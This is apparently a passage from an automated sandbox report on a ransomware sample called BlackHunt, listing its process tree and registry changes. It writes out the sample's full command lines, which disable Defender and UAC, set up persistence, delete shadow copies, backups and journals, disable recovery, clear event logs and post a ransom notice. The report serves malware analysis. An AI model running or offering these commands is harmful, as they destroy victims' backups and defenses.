ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 111 PID 4288 wrote to memory of 2128 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 111 PID 4288 wrote to memory of 2096 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 114 PID 4288 wrote to memory of 2096 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 114 PID 1076 wrote to memory of 3836 1076 cmd.exe 115 PID 1076 wrote to memory of 3836 1076 cmd.exe 115 PID 4288 wrote to memory of 1148 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 117 PID 4288 wrote to memory of 1148 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 117 PID 4468 wrote to memory of 1956 4468 cmd.exe 119 PID 4468 wrote to memory of 1956 4468 cmd.exe 119 PID 4288 wrote to memory of 3000 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 120 PID 4288 wrote to memory of 3000 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 120 PID 4288 wrote to memory of 3492 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 122 PID 4288 wrote to memory of 3492 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 122 PID 3296 wrote to memory of 1200 3296 cmd.exe 123 PID 3296 wrote to memory of 1200 3296 cmd.exe 123 PID 5056 wrote to memory of 1580 5056 cmd.exe 124 PID 5056 wrote to memory of 1580 5056 cmd.exe 124 PID 2096 wrote to memory of 1376 2096 cmd.exe 126 PID 2096 wrote to memory of 1376 2096 cmd.exe 126 PID 3196 wrote to memory of 4308 3196 cmd.exe 130 PID 3196 wrote to memory of 4308 3196 cmd.exe 130 PID 4288 wrote to memory of 2652 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 127 PID 4288 wrote to memory of 2652 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 127 PID 4288 wrote to memory of 4420 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 128 PID 4288 wrote to memory of 4420 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 128 PID 1148 wrote to memory of 1460 1148 cmd.exe 131 PID 1148 wrote to memory of 1460 1148 cmd.exe 131 PID 4288 wrote to memory of 4932 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 133 PID 4288 wrote to memory of 4932 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 133 PID 4288 wrote to memory of 2164 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 135 PID 4288 wrote to memory of 2164 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 135 PID 4288 wrote to memory of 548 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 134 PID 4288 wrote to memory of 548 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 134 PID 2128 wrote to memory of 3952 2128 cmd.exe 138 PID 2128 wrote to memory of 3952 2128 cmd.exe 138 PID 4288 wrote to memory of 4332 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 141 PID 4288 wrote to memory of 4332 4288 ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe 141 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe"C:\Users\Admin\AppData\Local\Temp\ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4288 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4524 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:3836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:3000
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3492
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2652
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:3172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4420
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:5676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4932
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:548
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:6304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2164
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:8652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4332
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:7320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:3920
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:6648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4688
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:6292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:3636
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:9348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2748
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:8132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4348
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:8124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4692
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3152
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:8136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4272
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:8496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe" /F2⤵PID:4456
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe" /F3⤵
- Creates scheduled task(s)
PID:8764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3524
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3908
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:8612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1492
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:9288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:948
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:8940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4988
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:7176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2316
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:9280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2948
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:10416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2252
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1840
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4860
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1584
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:7284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:6240
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:13304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:7700
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:8164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:10968
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:5272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:10032
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:9256
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:8420
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:5728
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:13384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:9124
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5552
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:10376
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:12576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:9220
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:13396
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:10344
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:11136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:10352
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:12864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:11688
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:7592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:6048
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:10696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:11668
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:12292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:10288
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:4784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:11228
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:12644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:6600
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:13592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:11356
-
